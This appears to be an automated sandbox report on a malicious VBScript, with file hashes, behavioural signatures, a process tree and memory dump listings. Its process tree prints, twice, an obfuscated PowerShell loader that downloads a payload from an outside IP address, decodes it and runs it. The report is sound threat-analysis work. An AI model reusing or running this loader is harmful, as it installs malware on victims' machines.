Overview

overview

10

Static

static

1

dddd96d33d...86.vbs

windows7-x64

10

dddd96d33d...86.vbs

windows10-2004-x64

7

Analysis

  • max time kernel
    93s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13/02/2024, 05:41

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    dddd96d33d61b8ed958455ce58442f2225f81a5f215525f143e48220fd47ac86.vbs

  • Size

    37KB

  • MD5

    38a7d7d9221cbbdaebc363213e712492

  • SHA1

    67aacef9422498071ed7395fdd2cd0538e2c9fee

  • SHA256

    dddd96d33d61b8ed958455ce58442f2225f81a5f215525f143e48220fd47ac86

  • SHA512

    d3a8ea582f2066be4759a753f2f22ac1d937a491218966011f87ec458c36a962062761425c0484ad79c10c13af2b983894491ef0606527e479e0c9b61c35ffef

  • SSDEEP

    768:vUJqmkNEmbCXqwCrz3kadHM3+oEWzMIHl+xAaRV0e:cJQE0b9rz/JMOoTzMIHw3r

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dddd96d33d61b8ed958455ce58442f2225f81a5f215525f143e48220fd47ac86.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2160
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Annoncy;function Dejligeaf ($Allemand, $Feis172, $Aktiec138) {$Allemand.'Substring'( $Feis172, $Aktiec138);}Function Blemishes9 ([String]$Disti254){For($Anno=5; $Anno -lt $Disti254.Length-$Cerco; $Anno+=6){$Tekn163=Dejligeaf $Disti254 $Anno $Cerco;$Continenta=$Continenta+$Tekn163}$Continenta;}$Venen175 = 'tzutil /l';$Lrestre = (cmd /c $Venen175);$Lrestre = [string]$Lrestre;$AnnoNDICE = $Lrestre.indexOf('1');$Cerco = Dejligeaf $Lrestre $AnnoNDICE 1;$Hovekat=Blemishes9 'VakeehStudettraadtRumvgpDorge: Kera/Linte/ Tunf4Afmon6 Opfo.Mascu1Nerve8bevom3Seros.Under2Trygl2Folke2Panch. Unco1Henst9Midso/ ApteOSwordbHalsksRealieAnxiorLgprdvBedive Bedm.Propphskjolh Overk Aime ';$Continenta01=Blemishes9 'FoliniJegroeAriusxNonso ';$Planlgnin = Blemishes9 'Vrdif\SvagtsTribuy FilmsOmstdwSakkaoMouslwAsymp6Forho4 Soli\ZolotWSlagtiDamernincondRadiooQuintw PatrsSanatPUnseao Outpw ScoreCafusrBulleSMousehhaense UnsclUredil Indo\ umbov Syrn1 Skrb. Libe0Unbus\ Partp UnbroKlokkwAbstrePaaserSkeocsresylh EneseSlrerlPlatelUnder. CampeNontrxCasteeFromm ';&($Continenta01) (Blemishes9 'humme$UnminLSilicaCoumaiFlskegHirsehFlages Exacc TaenoSigna2Udstr=Beskn$ Pyloeudfasn KonsvSligh: FormwigangiInternBayondSensuiPitmarTypho ') ;&($Continenta01) (Blemishes9 'Barba$ UnifPStatslAntiratipsenCollelFylkegKletknProdui AnaenDyrkn=Vekse$SnakeL PrecaKiloei HonngStorvhKranis Sponc garroUnfel2Dense+Swage$AgnosP atrilIndsuaAfkrinBoghvl Tempg Turgn MessiFiltrnBenva ') ;&($Continenta01) (Blemishes9 'Elsab$ StenTHustpiDialilBreridDmonekkronekMorfdePolyerCholi Grapp=Apope Chole( Rets(BetnkgSuperw Grommunflaibalti fissiwChlori HushnGlyce3 Etym2pseud_SyndepDispermarkro FlokcPremue Tents StdpsNunce modes-KontoFPleur overpP VorarLongbowiresc StikeSelvhs Scous LngoIkolledUnsup=Elegi$Proje{ForsnPLitteISivarD phle}Resta)Foren.FeasaC AartoKentam UncomMillia Workn QuindAdvisLOralfiSkovbn NonteFavel)Azoph Termo-DistrsPrangpElectl SeriiSikket Sesq Quist[nonadcMoirehStorma Toucr Insi]Oxbra3 Tiri4 Impa ');&($Continenta01) (Blemishes9 'Afhaa$svinePTiptolRigleu TosisReporgAntisr Supe Geote=Arpet Mblem$ AarsTSpidsigarcildentadUncarkKolonkAffodeGiftsr Akse[ Shop$SkrifTStetsi Skrul MiljdReedpkFiloskMetroe Quadr Nond.FiasccLskesostipeuHumannSmmomtRepro- Gram2Coapt]Bonde ');&($Continenta01) (Blemishes9 ' Elsh$IndekaIndusnSemies LetmkStilpaExtem=Reple( BeboT CosieRerigsBiobitTarmi-ginetPIntraa SmovtUretehUvanl Lingo$SweetPTungelImbibaRiggenIdeallDrypsgKaratnInkasi Varin Orga) Mems Kdgry-HonduA SvalnAcetodExpul Const( Ecek[KriteI AftenDisqut SproPPumpetOsteorDispr]Chron:Menuv:PytonsFremtiTilriz SamseHartl Progr-BoudeeRapkfqAdvoc Vider8Wayfa)Ovenp ') ;if ($anska) {.$Planlgnin $Plusgr;} else {;$Continenta00=Blemishes9 'PuritS PinatSproga HvalrToldktMulti-OvertBLsriviklasstlugersSelvoTDeceirKomplaSlagtnhjemvs Pseuf Rangeplafor Slot Tigel-CandySInteroFiresuBeginrFuldbcStjereSkirr Coatr$NoncoHPredioFirklvHepatePrealkhenveaContltcotar Fourb- WhifDUlempeCoelisBelgitFrantiSkyttnClariaPigmetValenihatreoSkansnPropu Talku$UnpasLMahoma ForeiUnorbgArbejhSensisSkolecInstioColit2Krykk ';&($Continenta01) (Blemishes9 'Selet$ SorrL Bonaa ShriiIntergUnaschDatossPrisicMaruloZoosp2Renew=Rumfr$ Baske SpornSpndsvEffek:StunsaprodupAddenpSultedLoffeaJuanitEfferaLaane ') ;&($Continenta01) (Blemishes9 'ProreIFortjmGrundpCoeleoKommar Nulpt Loob-HusvaMHofdioBlndldKrumtuFamillDisboe Hjem CoupeBStrikiUdsputOverssGullaTIntrarRetroaFormanDiplosJagtef SkeleForbur Stru ') ;$Laighsco2=$Laighsco2+'\phrenohe.Fly';while (-not $Fron) {&($Continenta01) (Blemishes9 'Autae$SamleF InterPhysioCzarinRuche= Kryd(PenneTGameteUlvers PeritFyrre- AidaPLedeba StiktSpndih Stbe upopu$BuddiLBreweaAffotiBetydgdiffehTachysLurencslutpoDeeps2Susaa)Fremb ') ;&($Continenta01) $Continenta00;&($Continenta01) (Blemishes9 ' KlumSsatirtStandaSteerrDebritAppli-FrontSBaggrlbacteefinane TegnpLocke Bogf5Juice ');}&($Continenta01) (Blemishes9 ' Taxa$EkskoB BegolRaadfeGrundm AcroiJordssSomnoh Diale RepusBevge Trans=Fouls ElektGSmackeStatstTersv-FjervCStormoreclanInkartHalluelertjnTempotTilko Beeke$EggfiL SkydaBlankiDisapgLangthSegresObscecFoneto Untr2Flamm ');&($Continenta01) (Blemishes9 'Nonco$SingeUSprinn Tilfpmundto AvicpOophouVibralHorreaRibestStatsedaemo Bonyt=Daken Forko[DeputSBgernymecons Unwot ApexeTvindmInter.FiskeCSkarnoAnstanAgamov milie ModerTempotHabil]schoo:Penci:ReroyFDrukmrChiefo EkelmDejedBPhaetaSeleus PlejeCocka6Gotha4SurfaSSlingtKulisr RoutiPneomnTaktigTmrer( Kond$KumpaB Opnolpolite TantmPeartiSporas EnsohazureeJournsBesgs)boyfr ');&($Continenta01) (Blemishes9 'Aftal$SuperC FuldoSterenOkkultPampeiBekymn ForkeSoftwnPorkotSamkvaufine2Plets Rntge=Camph Ahorn[ PrivSEmulsyMinims VesttSkriveSemidm Jong.SivsaT TerreKinesxTextttExtra.HenriESimuln SpracSubstoDaarldNovati SpeanOplivgNonre]Joggi: slit:HomosA bittSIncorCDiffeI OxydIBorer. BulrGHusboeblimptPheriSFdseltUngrarRevoliLydmunForlagFagbl(Ferie$VektoUMaladnjonispMaddyoSystepCytomuGylpelExteraProtot Alleekruse)Aabni ');&($Continenta01) (Blemishes9 'Litte$StraaSlegibybacchgPreulgComon=tarra$ stamCEnkeloGerninEkspotFujitiDinocnSnknieFamilnHeavetAmbula Mais2Flavo. GtemsunpaluLoangbPotwosOphavtGeofyrFolkeiClodhnRechegskall( Skat2 Anaz9nderz6Brush1Ganes0Daahi2 Star, Inte1Pulpi9Timev8Bille9Inkor6 Pent)Tisse ');&($Continenta01) $Sygg;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4988
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "tzutil /l"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1944
        • C:\Windows\system32\tzutil.exe
          tzutil /l
          4⤵
            PID:3076
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Annoncy;function Dejligeaf ($Allemand, $Feis172, $Aktiec138) {$Allemand.'Substring'( $Feis172, $Aktiec138);}Function Blemishes9 ([String]$Disti254){For($Anno=5; $Anno -lt $Disti254.Length-$Cerco; $Anno+=6){$Tekn163=Dejligeaf $Disti254 $Anno $Cerco;$Continenta=$Continenta+$Tekn163}$Continenta;}$Venen175 = 'tzutil /l';$Lrestre = (cmd /c $Venen175);$Lrestre = [string]$Lrestre;$AnnoNDICE = $Lrestre.indexOf('1');$Cerco = Dejligeaf $Lrestre $AnnoNDICE 1;$Hovekat=Blemishes9 'VakeehStudettraadtRumvgpDorge: Kera/Linte/ Tunf4Afmon6 Opfo.Mascu1Nerve8bevom3Seros.Under2Trygl2Folke2Panch. Unco1Henst9Midso/ ApteOSwordbHalsksRealieAnxiorLgprdvBedive Bedm.Propphskjolh Overk Aime ';$Continenta01=Blemishes9 'FoliniJegroeAriusxNonso ';$Planlgnin = Blemishes9 'Vrdif\SvagtsTribuy FilmsOmstdwSakkaoMouslwAsymp6Forho4 Soli\ZolotWSlagtiDamernincondRadiooQuintw PatrsSanatPUnseao Outpw ScoreCafusrBulleSMousehhaense UnsclUredil Indo\ umbov Syrn1 Skrb. Libe0Unbus\ Partp UnbroKlokkwAbstrePaaserSkeocsresylh EneseSlrerlPlatelUnder. CampeNontrxCasteeFromm ';&($Continenta01) (Blemishes9 'humme$UnminLSilicaCoumaiFlskegHirsehFlages Exacc TaenoSigna2Udstr=Beskn$ Pyloeudfasn KonsvSligh: FormwigangiInternBayondSensuiPitmarTypho ') ;&($Continenta01) (Blemishes9 'Barba$ UnifPStatslAntiratipsenCollelFylkegKletknProdui AnaenDyrkn=Vekse$SnakeL PrecaKiloei HonngStorvhKranis Sponc garroUnfel2Dense+Swage$AgnosP atrilIndsuaAfkrinBoghvl Tempg Turgn MessiFiltrnBenva ') ;&($Continenta01) (Blemishes9 'Elsab$ StenTHustpiDialilBreridDmonekkronekMorfdePolyerCholi Grapp=Apope Chole( Rets(BetnkgSuperw Grommunflaibalti fissiwChlori HushnGlyce3 Etym2pseud_SyndepDispermarkro FlokcPremue Tents StdpsNunce modes-KontoFPleur overpP VorarLongbowiresc StikeSelvhs Scous LngoIkolledUnsup=Elegi$Proje{ForsnPLitteISivarD phle}Resta)Foren.FeasaC AartoKentam UncomMillia Workn QuindAdvisLOralfiSkovbn NonteFavel)Azoph Termo-DistrsPrangpElectl SeriiSikket Sesq Quist[nonadcMoirehStorma Toucr Insi]Oxbra3 Tiri4 Impa ');&($Continenta01) (Blemishes9 'Afhaa$svinePTiptolRigleu TosisReporgAntisr Supe Geote=Arpet Mblem$ AarsTSpidsigarcildentadUncarkKolonkAffodeGiftsr Akse[ Shop$SkrifTStetsi Skrul MiljdReedpkFiloskMetroe Quadr Nond.FiasccLskesostipeuHumannSmmomtRepro- Gram2Coapt]Bonde ');&($Continenta01) (Blemishes9 ' Elsh$IndekaIndusnSemies LetmkStilpaExtem=Reple( BeboT CosieRerigsBiobitTarmi-ginetPIntraa SmovtUretehUvanl Lingo$SweetPTungelImbibaRiggenIdeallDrypsgKaratnInkasi Varin Orga) Mems Kdgry-HonduA SvalnAcetodExpul Const( Ecek[KriteI AftenDisqut SproPPumpetOsteorDispr]Chron:Menuv:PytonsFremtiTilriz SamseHartl Progr-BoudeeRapkfqAdvoc Vider8Wayfa)Ovenp ') ;if ($anska) {.$Planlgnin $Plusgr;} else {;$Continenta00=Blemishes9 'PuritS PinatSproga HvalrToldktMulti-OvertBLsriviklasstlugersSelvoTDeceirKomplaSlagtnhjemvs Pseuf Rangeplafor Slot Tigel-CandySInteroFiresuBeginrFuldbcStjereSkirr Coatr$NoncoHPredioFirklvHepatePrealkhenveaContltcotar Fourb- WhifDUlempeCoelisBelgitFrantiSkyttnClariaPigmetValenihatreoSkansnPropu Talku$UnpasLMahoma ForeiUnorbgArbejhSensisSkolecInstioColit2Krykk ';&($Continenta01) (Blemishes9 'Selet$ SorrL Bonaa ShriiIntergUnaschDatossPrisicMaruloZoosp2Renew=Rumfr$ Baske SpornSpndsvEffek:StunsaprodupAddenpSultedLoffeaJuanitEfferaLaane ') ;&($Continenta01) (Blemishes9 'ProreIFortjmGrundpCoeleoKommar Nulpt Loob-HusvaMHofdioBlndldKrumtuFamillDisboe Hjem CoupeBStrikiUdsputOverssGullaTIntrarRetroaFormanDiplosJagtef SkeleForbur Stru ') ;$Laighsco2=$Laighsco2+'\phrenohe.Fly';while (-not $Fron) {&($Continenta01) (Blemishes9 'Autae$SamleF InterPhysioCzarinRuche= Kryd(PenneTGameteUlvers PeritFyrre- AidaPLedeba StiktSpndih Stbe upopu$BuddiLBreweaAffotiBetydgdiffehTachysLurencslutpoDeeps2Susaa)Fremb ') ;&($Continenta01) $Continenta00;&($Continenta01) (Blemishes9 ' KlumSsatirtStandaSteerrDebritAppli-FrontSBaggrlbacteefinane TegnpLocke Bogf5Juice ');}&($Continenta01) (Blemishes9 ' Taxa$EkskoB BegolRaadfeGrundm AcroiJordssSomnoh Diale RepusBevge Trans=Fouls ElektGSmackeStatstTersv-FjervCStormoreclanInkartHalluelertjnTempotTilko Beeke$EggfiL SkydaBlankiDisapgLangthSegresObscecFoneto Untr2Flamm ');&($Continenta01) (Blemishes9 'Nonco$SingeUSprinn Tilfpmundto AvicpOophouVibralHorreaRibestStatsedaemo Bonyt=Daken Forko[DeputSBgernymecons Unwot ApexeTvindmInter.FiskeCSkarnoAnstanAgamov milie ModerTempotHabil]schoo:Penci:ReroyFDrukmrChiefo EkelmDejedBPhaetaSeleus PlejeCocka6Gotha4SurfaSSlingtKulisr RoutiPneomnTaktigTmrer( Kond$KumpaB Opnolpolite TantmPeartiSporas EnsohazureeJournsBesgs)boyfr ');&($Continenta01) (Blemishes9 'Aftal$SuperC FuldoSterenOkkultPampeiBekymn ForkeSoftwnPorkotSamkvaufine2Plets Rntge=Camph Ahorn[ PrivSEmulsyMinims VesttSkriveSemidm Jong.SivsaT TerreKinesxTextttExtra.HenriESimuln SpracSubstoDaarldNovati SpeanOplivgNonre]Joggi: slit:HomosA bittSIncorCDiffeI OxydIBorer. BulrGHusboeblimptPheriSFdseltUngrarRevoliLydmunForlagFagbl(Ferie$VektoUMaladnjonispMaddyoSystepCytomuGylpelExteraProtot Alleekruse)Aabni ');&($Continenta01) (Blemishes9 'Litte$StraaSlegibybacchgPreulgComon=tarra$ stamCEnkeloGerninEkspotFujitiDinocnSnknieFamilnHeavetAmbula Mais2Flavo. GtemsunpaluLoangbPotwosOphavtGeofyrFolkeiClodhnRechegskall( Skat2 Anaz9nderz6Brush1Ganes0Daahi2 Star, Inte1Pulpi9Timev8Bille9Inkor6 Pent)Tisse ');&($Continenta01) $Sygg;}"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2036
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "tzutil /l"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4036
            • C:\Windows\SysWOW64\tzutil.exe
              tzutil /l
              5⤵
                PID:428
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2036 -s 2384
              4⤵
              • Program crash
              PID:1640
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2036 -ip 2036
        1⤵
          PID:3272

        Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a0fs5x2o.m1m.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit

              • memory/2036-22-0x0000000005D80000-0x0000000005DE6000-memory.dmp

                Filesize

                408KB

                Download

              • memory/2036-30-0x0000000005E80000-0x00000000061D4000-memory.dmp

                Filesize

                3.3MB

                Download

              • memory/2036-40-0x0000000074E30000-0x00000000755E0000-memory.dmp

                Filesize

                7.7MB

                Download

              • memory/2036-39-0x0000000007B60000-0x0000000007B74000-memory.dmp

                Filesize

                80KB

                Download

              • memory/2036-13-0x0000000002B90000-0x0000000002BC6000-memory.dmp

                Filesize

                216KB

                Download

              • memory/2036-15-0x0000000002C30000-0x0000000002C40000-memory.dmp

                Filesize

                64KB

                Download

              • memory/2036-38-0x0000000007AD0000-0x0000000007AF2000-memory.dmp

                Filesize

                136KB

                Download

              • memory/2036-17-0x0000000005670000-0x0000000005C98000-memory.dmp

                Filesize

                6.2MB

                Download

              • memory/2036-16-0x0000000002C30000-0x0000000002C40000-memory.dmp

                Filesize

                64KB

                Download

              • memory/2036-18-0x00000000055E0000-0x0000000005602000-memory.dmp

                Filesize

                136KB

                Download

              • memory/2036-37-0x0000000008520000-0x0000000008AC4000-memory.dmp

                Filesize

                5.6MB

                Download

              • memory/2036-14-0x0000000074E30000-0x00000000755E0000-memory.dmp

                Filesize

                7.7MB

                Download

              • memory/2036-34-0x0000000006AA0000-0x0000000006ABA000-memory.dmp

                Filesize

                104KB

                Download

              • memory/2036-31-0x00000000064C0000-0x00000000064DE000-memory.dmp

                Filesize

                120KB

                Download

              • memory/2036-32-0x0000000006500000-0x000000000654C000-memory.dmp

                Filesize

                304KB

                Download

              • memory/2036-33-0x0000000007EA0000-0x000000000851A000-memory.dmp

                Filesize

                6.5MB

                Download

              • memory/2036-19-0x0000000005D10000-0x0000000005D76000-memory.dmp

                Filesize

                408KB

                Download

              • memory/2036-36-0x00000000076E0000-0x0000000007702000-memory.dmp

                Filesize

                136KB

                Download

              • memory/2036-35-0x0000000007820000-0x00000000078B6000-memory.dmp

                Filesize

                600KB

                Download

              • memory/4988-10-0x00007FFD39670000-0x00007FFD3A131000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/4988-9-0x000001FBE3600000-0x000001FBE3622000-memory.dmp

                Filesize

                136KB

                Download

              • memory/4988-12-0x000001FBCA6B0000-0x000001FBCA6C0000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4988-11-0x000001FBCA6B0000-0x000001FBCA6C0000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4988-43-0x00007FFD39670000-0x00007FFD3A131000-memory.dmp

                Filesize

                10.8MB

                Download